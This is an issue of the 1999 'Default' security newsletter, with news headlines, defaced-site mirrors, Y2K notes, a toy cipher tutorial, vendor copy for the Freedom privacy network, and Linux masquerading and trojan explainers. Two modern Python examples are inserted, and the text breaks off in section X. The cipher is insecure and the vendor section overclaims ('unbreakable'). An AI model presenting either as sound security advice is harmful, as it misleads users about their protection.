Default Newsletter Issue 03
--------------------------------------------------------------------------------
Default newsletter Issue #3
http://default.net-security.org
27.08.1999 Help Net Security
http://www.net-security.org
--------------------------------------------------------------------------------
TABLE OF CONTENTS
-----------------
I. Editorial
II. Last week's news on Help Net Security
a) Help Net Security news headlines
b) Defaced Pages
III. Y2K: As the millennium approaches
IV. A look into basic cryptography
V. Internet privacy: Freedom Network
VI. Macintosh Security: F33r my hybride M4c, I'm coding!
VII. Computing: A closer look at hard- and software
VIII. Linux: IP Masquerading
IX. Infection and vaccination
X. Freedom of speech - related incidents
XI. Scams - Getting something by all means
XII. Intrusion and detection part two
I. Editorial
------------
Hey people. We received good comments on Default newsletter from both individuals and
security professionals. We have only 2 issues behind us, but we will be even better (of
course with your feedback and help). If you would like to write an article for Default
newsletter, please do e-mail us. Any help is appreciated.
As you can see, this issue is a little bit shorter. That is because Doug Muth hasn't
come back from his holidays yet and Thejian and I were very busy this week. So do expect the next
Default newsletter to be bigger and better than the previous ones.
In case you want to mirror Default newsletter on your site, e-mail us as well ;)
Subscribing to Default newsletter:
send an e-mail to majordomo@net-security.org with a body message subscribe news your@email
Berislav Kucan
aka BHZ, webmaster Help Net Security
bhz@net-security.org
Xander Teunissen
aka Thejian, co-webmaster Help Net Security
thejian@net-security.org
II. Last week's news on Help Net Security
----------------------------------------
a) Help Net Security news headlines
- Friday 20th August 1999:
Default #2 released
ABC compromised
Belgian bank compromised
Intel extends on-line privacy ban
Homophobic web site "stolen" by hackers?
Indonesia responds to cyber war threats
Watching workers
Carding in Newcastle
- Saturday 21st August 1999:
Linux trojan in portmap.c
FTP.exe overflow
Biometrics in prisons
Office 2000 also vulnerable to Jet flaw
Former CIA director kept state secrets on home PC
Furor rising over PV wiretap plan
Student draws first net piracy conviction
- Sunday 22nd August 1999:
MS security bulletin #30
Sun says US army is testing Jini
Hardencrypt
E-commerce group formed to combat fraud
ReDaTtAcK busted
- Monday 23rd August 1999:
Firm nabs cracker with intrusion detection tool
First Net convict will do no time
GAO risk-assessment report
Sprint plans service to detect viruses
US Government and invasion of privacy
East Timorese domain host denounces cyberwar
Secure your web site
DOD speaks on Y2K
Bomb for Microsoft manager
- Tuesday 24th August 1999:
ISS X-force advisory on Lotus Domino server 4.6
Technology keys to tracking down Internet crime
Govt. home-invasion bill
Hackers scanning for trouble
Norton AntiVirus 2000 is out
Secret searches from DOJ
SSL CPU consumption causes concerns
Unix: It doesn't need to be so insecure
- Wednesday 25th August 1999:
Shoutcast compromised
HK police to establish computer crime team
Smith admitted to creating Melissa
New IE5 bug worse than ever?
Audit office blasts agencies' serious security flaws
Malicious attack on linux-kernel mailinglist
More cyber-war threats
- Thursday 26th August 1999:
Taiwan circles wagons in cyber-warfare
UK webhosting company hit by virus
Netscape issues web-server fix
Windows and bugs? Nooooo?
CWI cracks 512 bit key
Mounting an anti-virus defense
Tracing stolen computers through RC5
Self destructing e-mails? Nice
Y2K problems in Pakistan
Retrospective on cracking contest
Y2K test
http://net-security.org - Daily security related news
http://net-security.org/news - News archives
http://net-security.org/headlines.shtml - Add HNS headlines to your web-site
b) Defaced pages: (mirrors provided by Attrition (http://www.attrition.org))
Site: Red Hat Indonesia (www.redhat.or.id)
Mirror: http://default.net-security.org/3/www.redhat.or.id.htm
Site: Official Web site of Limp Bizkit (www.limpbizkit.com)
Mirror: http://default.net-security.org/3/www.limpbizkit.com.htm
Site: Monica Lewinsky's site (www.monicalewinsky.com)
Mirror: http://default.net-security.org/3/www.monicalewinsky.com.htm
Site: Madison Square Garden (www.thegarden.com)
Mirror: http://default.net-security.org/3/www.thegarden.com.htm
Site: The State University of West Georgia (www.westga.edu)
Mirror: http://default.net-security.org/3/www.westga.edu.htm
Site: Rock.com's Rolling Stone's Web site (www.stones.com)
Mirror: http://default.net-security.org/3/www.stones.com.htm
III. Y2K: As the millennium approaches
-------------------------------------
This week's Y2K headlines:
The computer network used by many Vermont police agencies and other
emergency services went down for two days this week while technicians
were preparing the system for the year 2000. While it was down,
prosecutors had problems getting police paperwork, reporters couldn't
get routine releases, and motorists needing copies of accident reports
were out of luck. Officials do not yet know why the computer crashed.
They do know it happened as technicians were upgrading the system to
prepare for Y2K. It took more than two days to get the system running
again. In the meantime, much of the record-keeping had to be done the
old-fashioned way: with pen and paper.
PC Week reported about MS Excel Y2K problems:
"Unless users of Microsoft Corp.'s Excel download scanning tools from
the company's Web site, their spreadsheets could go haywire when they
open their files on Jan. 1.
A Boston-based technology management consulting company has found that
an Excel year 2000 error causing drastic math errors went undetected
by a handful of Y2K analysis tools.
The core of the problem is that Excel versions through Excel 2000 have
a DATE() function that treats all two-digit years as 20th-century dates,
regardless of how Excel is configured to handle two-digit dates. As
a result, spreadsheets that use the DATE function are particularly
vulnerable to Y2K problems. (By default, Excel 97's and Excel 2000's
other date functions, as well as the software's data entry routines,
treat two-digit dates less than 30 as part of the 21st century)"
The Millennium Bug that promised to swell U.S. courts with lawsuits
arising from damage that may occur if a computer system fails to
recognize the Year 2000 so far has resulted in only 74 cases filed,
according to a report released Monday by PricewaterhouseCoopers.
The trickle has the potential to turn into a full-fledged flood after
the clock strikes midnight 1999, some experts said.
As of June 30, there were only 74 cases filed in state and federal
courts against 45 defendants that related to the Year 2000 computer
glitch (Y2K), according to the report.
Karen Shaw completed her 39-day trek across the state in which she
set out to promote Y2K awareness to rural residents of Oregon. The 49-year-old
teacher started her journey to show others that Y2K is coming very
soon, and they must be prepared. Shaw left Medford with only $20 but
said she lived on the generous donations of food and cash from people
she encountered along the way. She said: "I did not come across any
panicked people, but very practical, grounded, spiritual, caring people
who are just doing what their hearts tell them to do".
Hundreds of people in Japan complained Sunday after their automobile
navigation systems went haywire - the result of a Y2K-like glitch in
the satellite system used in navigation devices worldwide. Screens went
blank and bizarre symbols turned up on the electronic navigators,
essential for millions of drivers in a country where urban streets are
a chaotic jumble. Pioneer Corp, a major manufacturer of car navigation
systems, received about 600 calls on its help hotline, said company
spokesman Hidehiko Shimizu. Shimizu said callers were directed to the
nearest repair shop, where their systems were fixed for free.
Y2K TOOLS
---------
TITLE: Outlook Express Year 2000 Update
SIZE: 140 Kb
TYPE: Freeware
REQUIREMENTS: Windows 95/98/NT, Outlook Express 4.01
DOWNLOAD: http://default.net-security.org/3/en-x86-Q234681.exe
INFO: Part of Windows 98 Service Pack 1, this program will resolve a
year 2000 issue with Outlook Express 4.01. The year 2000 issue occurs
when receiving an IMAP mail message or a News message with a two-digit
year as the sent date. The date can be misinterpreted under certain
conditions. For example, if the two-digit year is anything other than
'99, Outlook Express assumes the century value is the same as the
current century. If the current year is 2000, and a two-digit date is
received as '97, then the year will be interpreted as 2097. However,
there is one special case when different logic is applied. If a
two-digit year of '99 is received and the current year is a multiple
of 100 (e.g., 2000), the year will be interpreted as the current year
plus 98 (e.g., 2098).
Berislav Kucan
aka BHZ
bhz@net-security.org
http://net-security.org
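The two-digit-year rule described for Outlook Express 4.01 above, written out as an added example (not the newsletter's or Microsoft's code) next to a clock-independent fixed-window interpretation. It assumes, since the text gives no separate rule, that a received '99 in a year that is not a multiple of 100 follows the same-century rule.

```python
# Added example: the two-digit-year logic the text attributes to Outlook
# Express 4.01, beside a fixed-window rule that does not depend on the clock.


def oe_401_year(two_digit_year, current_year):
    """Rule described in the update notes.

    A two-digit year other than '99 gets the current century; a '99 received
    while the current year is a multiple of 100 becomes current year + 98.
    The text gives no separate rule for '99 in other years, so the
    same-century rule is assumed to apply there (assumption).
    """
    if not 0 <= two_digit_year <= 99:
        raise ValueError("expected a two-digit year")
    if two_digit_year == 99 and current_year % 100 == 0:
        return current_year + 98
    return (current_year // 100) * 100 + two_digit_year


def windowed_year(two_digit_year):
    """Fixed-window rule (as in RFC 2822 section 4.3 for obsolete dates):
    00-49 are 2000-2049, 50-99 are 1950-1999. The result does not change
    when the clock rolls over to 2000."""
    if not 0 <= two_digit_year <= 99:
        raise ValueError("expected a two-digit year")
    return 2000 + two_digit_year if two_digit_year < 50 else 1900 + two_digit_year


def compare(two_digit_year, current_year):
    """(buggy interpretation, windowed interpretation) for one header date."""
    return oe_401_year(two_digit_year, current_year), windowed_year(two_digit_year)


if __name__ == "__main__":
    # Same header dates, read once in 1999 and once in 2000.
    for yy in (97, 99, 5):
        print(f"'{yy:02d}: in 1999 -> {compare(yy, 1999)}, in 2000 -> {compare(yy, 2000)}")
```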
IV. A look into basic cryptography
----------------------------------
This is where I left off when I was working on the HOWTO last.... so
from here on in is new and (slightly) improved.
I probably have my terminology wrong, but what follows is what I think is
called an output feedback cipher.
It takes the output from one step of applying the cipher, and uses
that to apply the cipher to the next part.
This is the simplest method of output feedback that I could think
of.
First index the alphabet in some manner, it could be using ascii values,
or it could be a simple 1-26 method (I suggest ascii because then you
will allow for punctuation, I used a simple 1-26 because it is easier
to explain the cryptosystem).
A=1 B=2 C=3 D=4 E=5 F=6 G=7 H=8 I=9 J=10 K=11 L=12 M=13 N=14
O=15 P=16 Q=17 R=18 S=19 T=20 U=21 V=22 W=23 X=24 Y=25 Z=26
This is a very basic transposition cipher as is, but will soon change.
The algorithm in mathematical terms is:
(N+P(1))%26=C(1)
(N+C(1)+P(2))%26=C(2)
(N+C(2)+P(3))%26=C(3)
(N+C(3)+P(4))%26=C(4)
...
(N+C(r-1)+P(r))%26=C(r)
This may seem complicated, but it's not.
N is a random number that will be passed on as a key. I suggest a
larger number to protect yourself from a brute force attack. Do not
use a number divisible by 26. In fact, for safety's sake, try using a
larger prime, or a product of two smaller primes.
C(1) is the first ciphertext letter
P(1) is the first plaintext letter
r is the total number of characters in the message.
% is the mathematical symbol for the function modulus.
Modulus is the remainder after dividing one integer by another integer.
So 28%26=2
and 942%26=6
(If your calculator doesn't handle modulus, a simple way to do it would be:
942/26=36.2307692307692307692307692307692
36.2307692307692307692307692307692-36=.2307692307692307692307692307692
.2307692307692307692307692307692*26=6
Round the result, since your calculator can't handle these decimals. Windows calc in
scientific mode can handle modulus; the key you are looking for is Mod.)
You take your message. Let's take the word hello for simplicity's sake.
HELLO
first change it to corresponding numbers.
8 5 12 12 15
our key number will be... 73. (once again, I suggest a more secure key
number than this, but this will serve our purposes well.)
1 2 3 4 5
8 5 12 12 15
Restate the Algorithm...
(N+P(1))%26=C(1)
(N+C(1)+P(2))%26=C(2)
(N+C(2)+P(3))%26=C(3)
(N+C(3)+P(4))%26=C(4)
...
(N+C(r-1)+P(r))%26=C(r)
And begin applying the algorithm:
H (73+8)%26=3
E (73+3+5)%26=3
NOW you see the power of a more complicated cipher. Here 3 stands for
both H AND E.
L (73+3+12)%26=10
L (73+10+12)%26=17
Once again, the power of a more complicated cipher: while 3 stands for
both H and E, L is represented by both 10 and 17.
O (73+17+15)%26=1
3 3 10 17 1
Then take these numbers, and transfer them back to letters.
A=1 B=2 C=3 D=4 E=5 F=6 G=7 H=8 I=9 J=10 K=11 L=12 M=13 N=14
O=15 P=16 Q=17 R=18 S=19 T=20 U=21 V=22 W=23 X=24 Y=25 Z=26
CCJQA
Now you ask: how do you get back to the original "HELLO"?
Well, first you need to find a way to tell someone the key number. I
suggest appending it to the beginning of the message; go back to how it
was in numbers. (Note: if someone knows the method you used to hide the
key number in the message, the security of the message is lost. This is
the case with all single-key cryptosystems.)
3 3 10 17 1
Here the key number was 73; that's 2 digits.
Add 2 7 3 to the beginning of your message:
2 7 3 3 3 10 17 1
Then turn it into text:
B G C C C J Q A
Send that to someone. They extract the numbers, and then the key
number of 73.
Here's an idea, I will make this section somewhat interactive.
If you can decrypt this message back to the original text of HELLO,
please send your analysis of how to decrypt it using mathematical terms
to crypto@net-security.org.
I'll go over all the emails and post who was first, and then go over it
in the next issue.
Have fun.
-Iconoclast
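The cipher above as an added example (written for this edit, not Iconoclast's code): it reproduces HELLO -> CCJQA with key 73, includes the inverse step that undoes the feedback, and shows that only N mod 26 reaches the output, so the cipher has 26 distinct keys however large N is chosen. Assumptions: a residue of 0 from the modulus stands for Z (26), and the key-prefix framing described in the text is not included.

```python
# Added example: the output-feedback substitution cipher from the article,
# with decryption. Letters are indexed A=1 .. Z=26 as in the article's table.
# Assumption not spelled out in the article: residue 0 from the modulus means Z.

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"


def letter_to_number(ch):
    """A=1 ... Z=26, the article's table."""
    return ALPHABET.index(ch.upper()) + 1


def number_to_letter(n):
    """Inverse of the table; residue 0 (or 26) is treated as Z."""
    return ALPHABET[(n % 26) - 1]


def encrypt(plaintext, key):
    """C(i) = (N + C(i-1) + P(i)) % 26, with C(0) = 0 for the first letter."""
    prev = 0
    out = []
    for ch in plaintext:
        if not ch.isalpha():
            raise ValueError("letters only: the 1-26 index has no room for other symbols")
        c = (key + prev + letter_to_number(ch)) % 26
        out.append(number_to_letter(c))
        prev = c  # this ciphertext value feeds the next step
    return "".join(out)


def decrypt(ciphertext, key):
    """Undo the feedback: P(i) = (C(i) - N - C(i-1)) mod 26.

    The receiver already holds the previous ciphertext value, so the
    steps are reversed in the same order they were applied."""
    prev = 0
    out = []
    for ch in ciphertext:
        c = letter_to_number(ch) % 26  # Z=26 is the residue 0
        p = (c - key - prev) % 26
        out.append(number_to_letter(p))
        prev = c
    return "".join(out)


def effective_key(key):
    """Only N mod 26 influences the output: 73 and 99 and 21 all encrypt
    identically, so the key space is 26 regardless of how large N is."""
    return key % 26


if __name__ == "__main__":
    print(encrypt("HELLO", 73))  # CCJQA, as worked in the article
    print(decrypt("CCJQA", 73))  # HELLO
    print(effective_key(73))     # 21
```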
V. Internet privacy: Freedom network
-----------------------------------------
The Freedom Network plays an integral role in Zero-Knowledge's
absolute privacy solution - Freedom.
Here's a quick look at what exactly the Freedom Network is
and what it does.
You'll often hear Freedom referred to as client/server
software, but what does this really mean? Well, the
"client" part is the software you install on your personal
computer and the "server" part is the software that runs
the Freedom Network.
The Freedom Network is a series of servers distributed
among ISPs and organizations around the world.
Internet traffic normally travels from source to
destination unsecured (i.e. not encrypted) while passing
through certain servers which can be easily identified.
This is like sending confidential information using a
postcard - anyone who handles the postcard knows the
sender, the recipient and the contents. This unsecured
delivery system makes message interception, falsification
and tracking possible.
To solve this problem, Freedom encrypts all Internet
traffic and routes it through a series of anonymous Freedom
servers, known as the Freedom Network.
Each server in the chain knows only the previous and
following servers in the path, and nothing about the traffic
(data) that it's handling. This makes the system extremely
secure since no single server knows both the origin and the
destination of the traffic.
In fact, no one, not even your ISP, can monitor your web
activities.
Does My ISP Need A Freedom Server For Me To Use Freedom?
It's important to note that your ISP doesn't need to run a
Freedom Server for you to enjoy the benefits of Freedom. If
they do opt to host one, however, you may notice an increase
in browsing speed while running Freedom. This will be
explained in greater detail in the next section.
- Network Speed
We often talk about what effect running Freedom will have
on your Internet connection speeds. These are also known as
"latency" issues.
Freedom employs a number of systems to foil any attempts at
analyzing Freedom user's Internet activities. The net
effect of these systems can result in slightly slower
connection speeds for some users. The exact latency, if
any, that a user will experience while running Freedom
depends on many factors, including;
- proximity to a Freedom Server
- geographic location relative to the Internet backbone
- the speed of your connection
- random Internet bottlenecks or "traffic jams"
When a user running Freedom connects to the Internet
through their ISP, that connection will use a greater
amount of bandwidth than a non-Freedom connection. As
mentioned above, this is due to the extra systems Freedom
employs to ensure user privacy.
This extra bandwidth consumption will be more taxing on an
ISP's servers as the Freedom user's traffic passes though
their system on its way to the first Freedom Server on the
Freedom Network.
If, however, the user's ISP is hosting a Freedom Server,
that server will be able to intercept this traffic much
earlier, thereby streamlining the entire process. This, in
turn, will result in quicker connection speeds for the
Freedom user.
To sum up, the closer a Freedom user's computer is to the
first Freedom Server, the less latency a Freedom user will
experience. Since the closest a user can possibly get to a
Freedom Server is if their ISP is running one - alerting
your ISP to the benefits of running a Freedom Server is a
good idea! :-)
For an up to date listing of worldwide Freedom Server
operators, please visit:
http://www.zeroknowledge.com/partners/founders.asp
Please keep in mind that this list gets bigger every day
as more server operators sign up so be sure to check back
often.
- Security Issues
"How is it possible that my ISP can't monitor my activities
since all my communications pass through their servers?"
Simple - all the data leaving your machine is encrypted
using strong crypto, which means that no one, not even
your ISP, can watch what you're doing.
In fact, whether you're sending email, surfing the Net,
chatting or posting to newsgroups, Freedom ensures that
your activities remain private!
Why should I trust your security when other supposedly
invulnerable codes and systems have been cracked?
- Software
Zero-Knowledge uses established public algorithms that have
proven to be impervious to attack. Well-known public algorithms
like Diffie-Hellman, Triple DES, Blowfish and others ensure that
the system will remain secure. ZK is uncompromising in its
testing and implementation of encryption technology, using only
established algorithms with unbreakable bit lengths - we do NOT
cut corners.
- The More Bits, The Stronger The Encryption
As a Canadian company, ZK can export encryption technology far
stronger than the US Government's 56-bit encryption export standard.
A document encrypted with 56-bit key length would have
72,057,594,037,927,900 possible keys. Freedom's encryption begins
at 128-bit key length, meaning it has
340,282,366,920,938,000,000,000,000,000,000,000,000 possible keys.
A supercomputer capable of trying one million keys per second in
a brute-force attack would require 10,000,000,000,000,000,000,000,000
years to find the right key. That's a long time.
- Personnel
A number of experts in the field of privacy and cryptography have
estimated that there are perhaps five people in the world capable of
designing and lending credibility to a system of this complexity. ZK
Chief Scientist Ian Goldberg appears on that short list.
ZK sought out Mr. Goldberg because of his reputation for cracking
other supposedly secure systems. As a grad student at UC Berkeley's
Internet Security, Applications, Authentication and Cryptography Group,
Ian cracked the 40-bit DES code in the RSA Data Security Challenge in
just three and a half hours. He also earned international recognition
for his part in breaking the Netscape SSL encryption system, as well
as the cryptography system used in the GSM cellular phone standard.
- Peer Review
Freedom has always been and will continue to be opened up for independent
review by acknowledged industry experts.
-- Bruce Schneier of Counterpane Systems will audit the source code
line-by-line to ensure that no cracks, holes or errors exist in the
encryption implementation. Mr. Schneier, another short-list member,
is well-known as a veteran cryptographer and author of Applied Cryptography:
Protocols, Algorithms, and Source Code, widely recognized as the bible of
cryptography.
Complete Privacy
ZK puts its customers' privacy first - with no exceptions. Unlike
key-escrow or third-party systems, Zero-Knowledge (as implied by its name)
is unable to determine who is behind a given pseudonym -- even under threat
of force.
Jordan Socran
Zero Knowledge Systems
(http://www.zeroknowledge.com)
VI. Macintosh security: F33r my hybride M4c, I'm coding!
-------------------------------------------------------------
Most underground Mac users are facing the same problem: only very few
people are actually coding network security tools on the Mac. The main
reason is that coding a TCP/IP stack would take hundreds of lines just
to initialize. Today many products offer an easy approach to
programming; developing a project in RealBasic (http://www.realsoftware.com)
is much easier than in CodeWarrior (http://www.metrowerks.com),
even if each has its specificities and uses a different language.
Security software is usually not very big, since it is focused on one type of
vulnerability.
It takes a long time to code and debug a program. Another way to create
your own tools is to use other languages that are faster to code in and to use.
Many cross-platform languages exist. The most useful are C/C++, Visual Basic,
perl, php3, java, rebol and many more. Rebol is a great new language, 100%
network oriented (http://www.rebol.com), and it is easy to code in. You can do
many things, from a basic mail client to databases, a table builder or a port
scanner. In a few minutes you can build, for example, a scanner for a remote
vulnerability on IP ranges. A few months ago I made a cgi-check-like tool in rebol;
it scans for around 70 famous vulnerabilities, and it took a few minutes to
adapt it from a C source. Plus the code is run by a virtual machine
(available for 17 OSes), and it is quite fast. Don't expect a well designed
piece of software full of colour, because it's command line only.
Another language is perl. Many sources are available in the security
domain; you can easily use those with MacPerl and/or with a local
webserver. Make sure those sources are likely to work on your OS before you
even think about using a firewall admin tool in perl.... Anyway, if you
plan to use other languages that can't run on MacOS, you can use an
emulator, or install LinuxPPC.
The Macintosh, with tools like "RealBasic", allows you to build
software in an almost code-free way. Everything is performed
graphically, except all commands.
The compiler allows you to build software for MacOS and for Wintel.
For java it's more difficult to code, even if JDK tools are
available for the Mac.
It'll ask a lot of patience of you. If you are just starting to program and want
to learn fast, you'd better start with RealBasic. Many people from the Mac
underground scene code with RealBasic; for example Portsniffer
(http://software.theresistance.net) is a great product. It's one of the
fastest port scanners I've ever seen on the Mac. Another alternative is Mac OS X,
a Unix-like made by Apple. Many Unix tools are available or usable on
this OS. It's a Unix that is easier to configure, since Macintosh computers have fewer
types of hardware. Before you choose any language you'd better learn how
to code; sometimes it takes years to be able to claim to know a language. Don't
forget that the only limit you have is your imagination!
deepquest
deepquest@default.net-security.org
All rights not reserved- Serving since 1994
http://www.deepquest.pf
VII. Computing: A closer look at hard- and software
----------------------------------------------------
The Intel Celeron CPU was introduced at the end of June 1998 with a version clocked at
266 MHz, aiming to counter the success of the AMD K6-2 processor released a
month earlier. It used the 0.25 micron Deschutes core of the Pentium II CPUs but it
had no L2 cache. This technical solution gave high performance
in floating point calculation, thanks to a floating point unit (FPU)
identical to that of the Pentium II CPUs, but left a big gap in integer
performance, compared to both the K6-2 and the Pentium II, due to the lack of L2 cache.
In July 1998 the 300 MHz version was released, still without L2 cache,
while at the beginning of September the 300A and 333 MHz versions were launched,
with 128 Kbytes of L2 cache running at the core clock frequency (against the 512 Kbytes at half
clock frequency of the Pentium II CPUs) and placed within the core of the processor (on die).
The introduction of the L2 cache reduced the integer performance gap
of the previous Celeron versions, making this processor a perfect
solution in every field. The technical features of the Celeron CPU up to September 1998 can
be summarized as follows:
· Deschutes core at 0.25 microns (as for Pentium II CPUs), called Mendocino for
CPUs including L2 cache and Covington for those without L2 cache;
· L1 cache of 32 Kbytes divided in two parts of 16 Kbytes each, for
instructions and data respectively (as for Pentium II);
· L2 cache of 128 Kbytes running at the clock frequency and placed on die (in the Pentium II it
amounts to 512 Kbytes running at half clock frequency and placed on the processor cartridge,
outside the CPU core);
· Frequency multiplier locked both upwards and downwards;
· Bus frequency of 66 MHz against the 100 MHz of the Pentium II CPU;
· SEPP package, which is cartridge based and uses Slot 1 motherboards (the same used
by Pentium II CPUs).
Intel marketing has always kept the Celeron processors low-cost, on one side to
compete with the AMD K6-2 in the low-end market, on the other to avoid adding an expensive product
next to the Pentium II. Let's note two aspects:
· The Celeron uses a bus frequency of 66 MHz while that of the Pentium II is 100 MHz; even if in practice
the differences in performance between the two solutions, at the same clock frequency,
are small, to the user the first seems to be the cheaper one while the second seems more
"professional", so many buy systems based on the Pentium II, with more profit for Intel.
· The performance of the Celeron Mendocino and the Pentium II, at the same clock frequency, is
almost equal; the Pentium II has a big advantage when used in a server, where the presence of
an L2 cache 4 times bigger, even if running at half clock frequency, is evident. For this
reason, Intel has always maintained a high clock difference between the two CPUs, so as to
avoid power users buying a Celeron with a higher frequency, less profitable than the Pentium II.
At the beginning of 1999 a new version of the Celeron Mendocino CPU was released; while the
technical features are the same, the package of the CPU, the SEPP one, was
replaced by a PPGA one:
SEPP package: it is installed in Slot 1 and it is similar to a Pentium II CPU without the
external plastic cover; note, in the middle, the CPU core and the space on its sides where,
on Pentium II CPUs, the L2 cache chips are.
PPGA package: very similar to a Pentium MMX CPU, it is more compact compared to the SEPP
version and it is installed in Socket 370.
Officially, the reason which led to the introduction of the PPGA package was to reduce
the production cost of the processor, as the SEPP package, a heritage of the Pentium II,
no longer needed to exist once the L2 cache was no longer placed on it but directly within
the CPU core.
Another reason, linked to marketing, is that of making the processor market more segmented:
Slot 1 for more "professional" systems based on Pentium II and Pentium III processors,
Socket 370 for the cheaper ones based on the Celeron CPU. Up to the 433 MHz version both
variants of the Celeron, SEPP and PPGA, were available, while from the 466 MHz version on
SEPP was almost completely abandoned.
The Celeron CPU was very successful due to its general performance in every field and to the
high overclockability which characterized almost every version; with these processors it
was possible to achieve high clock frequencies, higher than those of the Pentium II processors,
with a very small investment. This article aims at checking the overclockability of the
Celeron CPU and finding, where possible, which version of the Celeron CPU is the best
in terms of price and performance.
Damir Kvajo
aka Atlienz
atlienz@default.net-security.org
VIII. IP Masquerading: Multi-computer access to a network via single interface on the server
-----------------------------------------------------------------------
IPmasq basis:
When you set up an IP Masquerading system on your Linux server,
other machines on the *local* network will be able to use
the single network interface on the server. The most common usage
is to provide Internet access to other machines which do not
have their own connection.
The difference between Linux IPmasq and Windows tools (e.g. Wingate)
There is a big difference between the two. IPmasq is an "IP forwarding
system", while Wingate acts as a proxy. So, to make a machine
use Wingate, each application has to be configured separately,
while to use IPmasq one just has to set up a "default gateway"
on the machine. Further adjustments of client permissions are made
on the server side (by modifying the firewall rules). Also,
IPmasq is capable of forwarding any kind of protocol, even those
which do not have a special IPmasq helper application.
Kernel options. To enable IP masquerade in the kernel, select:
- ip firewalling - packet filter firewall on a Linux box
- ip always defragment - necessary for ipmasq to work. The packet is
defragmented (put back into one piece from the network fragments) on the server
and then goes on its way.
- ip masquerading - actual ip masq support
- transparent proxy support - by selecting this option, client machines think
they communicate with the end server, while in fact it is a local proxy.
- ICMP masquerading - adds IPmasq ICMP support (without this, the system
does it only for UDP and TCP (and ICMP errors)).
- ipmasq special modules support
- ipautofw masq support
- ipportfw masq support
(optional)
- optimize as router
Tools to get:
- ipmasq (the automatic ipmasq script, very useful, just be sure to
get the new one with the ipchains support in it)
- ipchains
- ipautofw
- ipportfw
- ipmasqadm (special modules support)
Once you are finished with the kernel configuration, compile it and
install the new kernel. Add:
echo "1" > /proc/sys/net/ipv4/ip_forward
to some of your system initialization scripts (or do it manually).
After you raise the interface you want others to use (usually ppp0),
just run "ipmasq" to recompute firewall rules. By default, IPmasq
allows only the local network to use the interface.
Client side adjustments:
Linux:
as root, execute:
route del default; route add default gw your.servers.ip.address
You can see the current routing table by issuing "route", active
connections with "netstat", interfaces with "ifconfig"
Windows:
as any user (9x) click Start->Settings->Control panel->Network->
TCP/IP-network device and in the Gateway tab, add your server's IP
to the list.
dev
dev@net-security.org
IX. Infection and vaccination
----------------------------
Since school is back in for a lot of people, the number of trojans
being made/updated has decreased (same with the length of this article).
So, this is the first of a few articles that simply explain general
info about trojans, to help remove them. We also have info on the new
LockDown 2000.
As most people know, a trojan is a program that says it will do something
and then does something else. Currently the only security hole trojans
take advantage of is someone willing to run a program. Here is the
general way most trojans infect people:
1. Someone is tricked into running the trojan
2. Then it copies to another location
3. After that it starts listening for connections
4. Writes to the registry so it will load with Windows
Windows lets programs autoload when booting many different ways. Just
about everyone knows about the startup folder on the start menu. Most
trojans don't use this method, though we have seen at least one that
did. Another autoloading method is via the registry. This is the most
common way a trojan uses to start with windows. While lesser known is
the win.ini and even system.ini.
A common thing trojan users do is to "bind" the trojan they
want to infect someone with. Binding allows them to turn a harmless
program into a dangerous one. Popular trojans such as DeepThroat and
SubSeven come with such tools, while many separate tools that do the
same exist and are easily found (such as silkrope). Binding also makes it
more difficult for the trojan to be picked up by virus/trojan scanners, but it
is still possible.
We were lucky enough to see and get information on LockDown 2000 Version
4.0 Pre-Release. This version fixes some minor bugs and gives the user
some more control. Another handy feature is that it saves the
configuration changes you made when you exit. Plus, the trojan count has
been increased to 378. Unfortunately the price is still probably high at
99 US dollars. We also have not had the chance to test it personally;
maybe by next week we can.
zemac
zemac@dark-e.com
http://www.dark-e.com
X. Freedom of speech - related incidents
------------------------------------------
*******************************************************************
Independence is my happiness, and I view things as they are, without
regard to place or person; my country is the world,
and my religion is to do good.
- Thomas Paine
*******************************************************************
Every day the battle between freedom and repression rages through the global ether.
Here are this week's link highlights from NewsTrolls (http://www.newstrolls.com):
----------------------------------------------------------------------
Weekend August 20-22
US redoubling efforts to
<http://dailynews.yahoo.com/h/nm/19990820/ts/technology_covert_3.html>
invade encrypted privacy
And the US DOJ wants easier
<http://www.washingtonpost.com/wp-srv/business/daily/aug99/encryption20.htm>
covert action capabilities
-----------------------------------------------------------------
Monday August 23
Recently freed Lafitte says the World Bank is to blame
<http://www.insidechina.com/features.php3?id=87242.>
for the detentions...
"Lafitte, a Tibetan expert, said he had grave fears about the safety
of his local translator, Tsering Dorje, and for Meston, who reportedly
suffered spinal and internal injuries when he jumped from a building
while trying to escape police. "The World Bank must bear direct
responsibility for what happened and must act with its unique leverage
as the biggest provider of capital to China to do something to help both
the American, who is in trouble but at least has the American government
to help him. "And particularly I feel it's the responsibility of the
World Bank to do something for our translator, who has no government he
can turn to...to protect him," he said."
Under Chinese detention for investigating World Bank program,
<http://www.washingtonpost.com/wp-srv/inatl/feed/a30394-1999aug23.htm>
Meston, an American, somehow fell out of a 3-story building and broke his back...
"The men assigned to monitor Lafitte told him at least three times that he was
lucky he was Australian, and not American, because the United States had bombed
China's embassy in Belgrade. "America is always trying to hold us back,
trying to make us weak," he recalled one saying."
-------------------------------------------------------------------
Tuesday August 24
The Federal Reserve Board's opposition to
<http://www.innercitypress.org/frreport.html>
the Freedom of Information Act...
Thousands of Mexican Indians and Zapatista supporters
<http://asia.yahoo.com/headlines/240899/world/935433360-90823183648.newsworld.html>
march in protest against military presence in Chiapas
African consumers speak out on
<http://www.africanews.org/atlarge/stories/19990823_feat5.html>
product dumping and market liberalization at their expense...
"According to Consumers International, consumption per capita in Africa has
gone down by 20 percent over the past 20 years. Under the current exchange
system, Least Advanced Countries will lose up to 600 million US dollars per year.
This painful reality is contrary to the main objectives of the WTO charter,
which requires signatory parties to recognise that the objective of their
trading and economic relations must be to raise the living standards of the
populations through employment of higher incomes. This is why African consumer
organisations have been pressing decision makers and multinational companies
to stop regarding consumer rights as a hindrance to trade and investment."
----------------------------------------------------------------------
Wednesday August 25
Iran paper calls for
<http://asia.yahoo.com/headlines/250899/world/935575740-90825100957.newsworld.html>
pre-election live TV debates...
"The Iran News also said conservative-dominated state television has
"shied away from the clash of ideas" and that its programming has
"not been able to quench the public thirst for more accurate and
impartial information.""
He Zhaohui, 32, labor activist gets 10 years in prison for
<http://www.insidechina.com/news.php3?id=87778>
"providing information to overseas organizations"
"He, who organized over 10 workers' demonstrations in Chenzhou in 1997 and 1998,
reported workers' protests in the province to democracy movements and human
rights organizations in the United States, the center said."
Over 10,000 pro-independence demonstrators
<http://asia.yahoo.com/headlines/250899/news/935568600-90825081041.newsasia.html>
rally in Dili ahead of East Timor elections...
More on
<http://news.bbc.co.uk/hi/english/world/asia-pacific/newsid_429000/429563.stm>
the rally...
